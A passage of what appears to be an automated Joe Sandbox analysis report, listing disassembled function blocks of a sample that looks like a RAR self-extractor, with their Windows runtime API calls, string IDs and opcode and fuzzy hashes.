                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                        • String ID: %s%s%u
                                                                                        • API String ID: 689974011-1360425832
                                                                                        • Opcode ID: 53eff0baa41b2f0329897d5e6279fabd99ea8ade8a8ef5ba1709fba0161f54ea
                                                                                        • Instruction ID: 7564973a3c1f479132d0fe3db62590c168a8150e497608c6c3e502c623f2d1e8
                                                                                        • Opcode Fuzzy Hash: 53eff0baa41b2f0329897d5e6279fabd99ea8ade8a8ef5ba1709fba0161f54ea
                                                                                        • Instruction Fuzzy Hash: 84416071900658AADF36DB50DC45EEA77BCEB05300F40C0A6F90DE7041EB789A44CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00382937
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0038293F
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 003829C8
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 003829F3
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00382A48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373
                                                                                        • Opcode ID: 854a40ba1ba5bebde62accabca9f04b345533e0fb35403235c1206b8f5c219e4
                                                                                        • Instruction ID: de3babe8bf5b6772dae09a79da6d80216a5897988ca1816a6ec46cd607ff1081
                                                                                        • Opcode Fuzzy Hash: 854a40ba1ba5bebde62accabca9f04b345533e0fb35403235c1206b8f5c219e4
                                                                                        • Instruction Fuzzy Hash: 6041C234A00308AFCF16EF68C885A9FBBF5AF45324F1480D6E815AB392D735DA51CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                        • API String ID: 176396367-3743748572
                                                                                        • Opcode ID: b24059fc615b968bfcd5ec5f91164314fe3e878da154d4a419e41a659f5f0922
                                                                                        • Instruction ID: 36d0c408be98843a75ecfe7dff2c8374419f6cb5ba02bd1846399e8ca077fb15
                                                                                        • Opcode Fuzzy Hash: b24059fc615b968bfcd5ec5f91164314fe3e878da154d4a419e41a659f5f0922
                                                                                        • Instruction Fuzzy Hash: A631A27264430556DA32BB549C03F7B73A4EB80720F51C61FF98A4B2C0FB68BD4183A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0038C868: _free.LIBCMT ref: 0038C891
                                                                                        • _free.LIBCMT ref: 0038C8F2
                                                                                          • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                          • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                        • _free.LIBCMT ref: 0038C8FD
                                                                                        • _free.LIBCMT ref: 0038C908
                                                                                        • _free.LIBCMT ref: 0038C95C
                                                                                        • _free.LIBCMT ref: 0038C967
                                                                                        • _free.LIBCMT ref: 0038C972
                                                                                        • _free.LIBCMT ref: 0038C97D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                        • Instruction ID: bf1f6088252f0041dacd8b31dbabbf9fb8f6507266c8744e43d4b1591f41a24c
                                                                                        • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                        • Instruction Fuzzy Hash: 5E1163715D0B08BAE522B7B1CC0BFCB7BADEF00B00F801C55B29D6E592EA75B5098760
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0037E669,0037E5CC,0037E86D), ref: 0037E605
                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0037E61B
                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0037E630
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                        • API String ID: 667068680-1718035505
                                                                                        • Opcode ID: 9bca716975354faa2f58efcfa3070d5f678716004981292273373ca8ec3d5c59
                                                                                        • Instruction ID: a38114352668f05c9ee803f0372b35c57939219cbbe0d683dbaaf639ac8906d7
                                                                                        • Opcode Fuzzy Hash: 9bca716975354faa2f58efcfa3070d5f678716004981292273373ca8ec3d5c59
                                                                                        • Instruction Fuzzy Hash: 7DF02BB57802225B4F335F755C84AA632CC6B2E741712C4B9E90ED3201EB28CC606B90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 0038891E
                                                                                          • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                          • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                        • _free.LIBCMT ref: 00388930
                                                                                        • _free.LIBCMT ref: 00388943
                                                                                        • _free.LIBCMT ref: 00388954
                                                                                        • _free.LIBCMT ref: 00388965
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID: p9
                                                                                        • API String ID: 776569668-1904256876
                                                                                        • Opcode ID: fdf6a842b2277d13eaa610a2fb94ee3449f362d5e48a9d1b15ac801979258f33
                                                                                        • Instruction ID: 51f6e7597ec5d839c00307d72c53b6ae5e7a73af024ecd2d107c4f3c9e006e50
                                                                                        • Opcode Fuzzy Hash: fdf6a842b2277d13eaa610a2fb94ee3449f362d5e48a9d1b15ac801979258f33
                                                                                        • Instruction Fuzzy Hash: DDF0D076810212DB8687BF24FD018163BAAF724724F810546F554D63B1CFB25D569B91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 003714C2
                                                                                          • Part of subcall function 0036B146: GetVersionExW.KERNEL32(?), ref: 0036B16B
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003714E6
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00371500
                                                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00371513
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371523
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371533
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2092733347-0
                                                                                        • Opcode ID: 2ce4ed4a85ffaa945ade7845202aa451fbfef8579b5f7433d189b63a69fe0ff1
                                                                                        • Instruction ID: 1972b86c7d3284ff62065b7c64640106545071710f9e9525fbefeadb87153ffc
                                                                                        • Opcode Fuzzy Hash: 2ce4ed4a85ffaa945ade7845202aa451fbfef8579b5f7433d189b63a69fe0ff1
                                                                                        • Instruction Fuzzy Hash: 3C31FA76118305ABC705DFA9C88499BB7FCBF98714F00491EF599C3210E734D549CBA6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,00382AF1,003802FC,0037FA34), ref: 00382B08
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00382B16
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00382B2F
                                                                                        • SetLastError.KERNEL32(00000000,00382AF1,003802FC,0037FA34), ref: 00382B81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: e80ce4c742d380274ef1b744e83adc6e54b09779edede39619d455edec941e4b
                                                                                        • Instruction ID: a56b27f71d7cf575e9d17aa7a2d3d3d8bb1a5e51ffa4cc694eb2df827d21dfcf
                                                                                        • Opcode Fuzzy Hash: e80ce4c742d380274ef1b744e83adc6e54b09779edede39619d455edec941e4b
                                                                                        • Instruction Fuzzy Hash: 4001D43310A711AEE6273BF4BC899672B9DEB41BB4B6007BBF510592E0EF625C40D344
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,003A1098,00384674,003A1098,?,?,003840EF,?,?,003A1098), ref: 003897E9
                                                                                        • _free.LIBCMT ref: 0038981C
                                                                                        • _free.LIBCMT ref: 00389844
                                                                                        • SetLastError.KERNEL32(00000000,?,003A1098), ref: 00389851
                                                                                        • SetLastError.KERNEL32(00000000,?,003A1098), ref: 0038985D
                                                                                        • _abort.LIBCMT ref: 00389863
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 3160817290-0
                                                                                        • Opcode ID: 90d6cc41c82276ffbb13b7b9540c35035b1c9338e007a0434e8b7032fad79166
                                                                                        • Instruction ID: f8fae1f6cb7768ed38c9422440caccb48a6fcf59ebc2f55428593429b002ac63
                                                                                        • Opcode Fuzzy Hash: 90d6cc41c82276ffbb13b7b9540c35035b1c9338e007a0434e8b7032fad79166
                                                                                        • Instruction Fuzzy Hash: 22F0C83614070366C6133374BC0AB7B1A6D8FD2771F2A05ABF525AA292FF3188068765
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0037DC47
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037DC61
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037DC72
                                                                                        • TranslateMessage.USER32(?), ref: 0037DC7C
                                                                                        • DispatchMessageW.USER32(?), ref: 0037DC86
                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0037DC91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 2148572870-0
                                                                                        • Opcode ID: 5bf4e77677001fdf783dde8d167976c6580c101bddcafb44700d6af329d52384
                                                                                        • Instruction ID: 3ec7e4b3a4e686e1f298604d8da7f75361064f9c24627bfa1c4cfa752fd3d022
                                                                                        • Opcode Fuzzy Hash: 5bf4e77677001fdf783dde8d167976c6580c101bddcafb44700d6af329d52384
                                                                                        • Instruction Fuzzy Hash: ABF03C72A01229BBCB326BA5EC4DDDB7F7DEF41791F008011B50BD2050D6799646CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0037A699: GetDC.USER32(00000000), ref: 0037A69D
                                                                                          • Part of subcall function 0037A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0037A6A8
                                                                                          • Part of subcall function 0037A699: ReleaseDC.USER32(00000000,00000000), ref: 0037A6B3
                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 0037A83C
                                                                                          • Part of subcall function 0037AAC9: GetDC.USER32(00000000), ref: 0037AAD2
                                                                                          • Part of subcall function 0037AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0037AB01
                                                                                          • Part of subcall function 0037AAC9: ReleaseDC.USER32(00000000,?), ref: 0037AB99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                        • String ID: "7$($A7
                                                                                        • API String ID: 1061551593-3396645701
                                                                                        • Opcode ID: 9640c8597578d0effdccbf1cb95a8ef6ddb4aaf1c5e3412271874d7f6e2dd501
                                                                                        • Instruction ID: dc3a7abdf124029d27981604d5698bb97cf0bb1aebefc952a537c13489f3cc48
                                                                                        • Opcode Fuzzy Hash: 9640c8597578d0effdccbf1cb95a8ef6ddb4aaf1c5e3412271874d7f6e2dd501
                                                                                        • Instruction Fuzzy Hash: A991F2B1608754AFD661DF29C84492BBBF8FFC9700F00891EF59AD3260DB35A945CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                          • Part of subcall function 0036B92D: _wcsrchr.LIBVCRUNTIME ref: 0036B944
                                                                                        • _wcslen.LIBCMT ref: 0036C197
                                                                                        • _wcslen.LIBCMT ref: 0036C1DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$_wcsrchr
                                                                                        • String ID: .exe$.rar$.sfx
                                                                                        • API String ID: 3513545583-31770016
                                                                                        • Opcode ID: 255ed14aba28fa9f6abd28a4019d216b0be9ff758ab633ca3d9bf819e58c145a
                                                                                        • Instruction ID: f53bdbbb0828b154a5d8168c9cb284c519b9219790794572d348b0018d496d65
                                                                                        • Opcode Fuzzy Hash: 255ed14aba28fa9f6abd28a4019d216b0be9ff758ab633ca3d9bf819e58c145a
                                                                                        • Instruction Fuzzy Hash: C7417A22560315D5CB33AF748812A7BB3A8EF42704F11E90EFCD6AF189EB648D81C395
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 0036BB27
                                                                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0036A275,?,?,00000800,?,0036A23A,?,0036755C), ref: 0036BBC5
                                                                                        • _wcslen.LIBCMT ref: 0036BC3B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CurrentDirectory
                                                                                        • String ID: UNC$\\?\
                                                                                        • API String ID: 3341907918-253988292
                                                                                        • Opcode ID: 222c2e2fd026fe256d5bc87831745935413ace9d7e8eb2e73144506ae8ef160e
                                                                                        • Instruction ID: 6735344d2a343eaf59fdcd5fa15fca07410fc994f2c3070e3a82ccfde8cbf5e1
                                                                                        • Opcode Fuzzy Hash: 222c2e2fd026fe256d5bc87831745935413ace9d7e8eb2e73144506ae8ef160e
                                                                                        • Instruction Fuzzy Hash: A141807144021AA6CF23AF60CC41EEEBBADAF45390F11C466F858EB155EB74DAD08F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _wcschr.LIBVCRUNTIME ref: 0037CD84
                                                                                          • Part of subcall function 0037AF98: _wcschr.LIBVCRUNTIME ref: 0037B033
                                                                                          • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcschr$CompareString
                                                                                        • String ID: <$HIDE$MAX$MIN
                                                                                        • API String ID: 69343711-3358265660
                                                                                        • Opcode ID: a63442ce706282dfa957e0077acdca1a305d792fcc2e744579f43b599574ff6d
                                                                                        • Instruction ID: 92502b3dccdba0436e7f5a49566d49f7586f568b6a0bfcc3705236e72029d8a6
                                                                                        • Opcode Fuzzy Hash: a63442ce706282dfa957e0077acdca1a305d792fcc2e744579f43b599574ff6d
                                                                                        • Instruction Fuzzy Hash: AD3173769006099ADF37DB64CC41AEE73BCAB15351F01C56AE509E7180EBB89E848FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0037AAD2
                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 0037AB01
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0037AB99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
